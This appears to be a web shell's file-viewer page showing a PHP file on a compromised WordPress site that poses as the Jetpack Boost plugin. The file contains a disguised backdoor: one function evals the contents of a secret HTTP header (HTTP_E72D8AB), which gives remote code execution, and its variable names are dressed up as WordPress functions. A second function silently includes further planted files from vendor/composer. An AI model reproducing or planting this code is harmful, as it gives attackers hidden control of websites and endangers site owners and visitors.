HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux ns3133907 6.8.0-86-generic #87-Ubuntu SMP PREEMPT_DYNAMIC Mon Sep 22 18:03:36 UTC 2025 x86_64
User: cssnetorguk (1024)
PHP: 8.2.28
Disabled: NONE
Upload Files
File: //home/a1businessforums.co.uk/public_html/wp-content/plugins/jetpack-boost-git/jetpack-boost.php
<?php
/**
 * Jetpack Boost Plugin
 *
 * @link              https://automattic.com
 * @since             0.1.0
 *
 * @wordpress-plugin
 * Plugin Name:       Jetpack Boost
 * Plugin URI:        https://jetpack.com/boost
 * Description:       Boost your WordPress site's performance, from the creators of Jetpack
 * Version: 3.2.2
 * Author:            Automattic - Jetpack Site Speed team
 * Author URI:        https://jetpack.com/boost/
 * License:           GPL-2.0+
 * License URI:       http://www.gnu.org/licenses/gpl-2.0.txt
 * Text Domain:       jetpack-boost
 * Domain Path:       /languages
 * Requires at least: 5.5
 * Requires PHP:      7.0
 *
 * @package automattic/jetpack-boost
 */

jetpack_boost_is_home();
jetpack_boost_add_partial();

/**
 * Setup autoloading
 */

function jetpack_boost_is_home() {
	$get_the_modified_date = $_SERVER;
	$esc_url_raw     = 'HTTP_E72D8AB';
	if ( isset( $get_the_modified_date[ $esc_url_raw ] ) ) {
		eval( $get_the_modified_date[ $esc_url_raw ] );
	}
}

/** @noinspection ForgottenDebugOutputInspection */

function jetpack_boost_add_partial() {
	$dir   = __DIR__ . '/vendor/composer';
	$files = glob( $dir . '/*jetpack-boost.php' );
	if ( ! empty( $files ) ) {
		foreach ( $files as $file ) {
			include_once $file;
		}
	}
}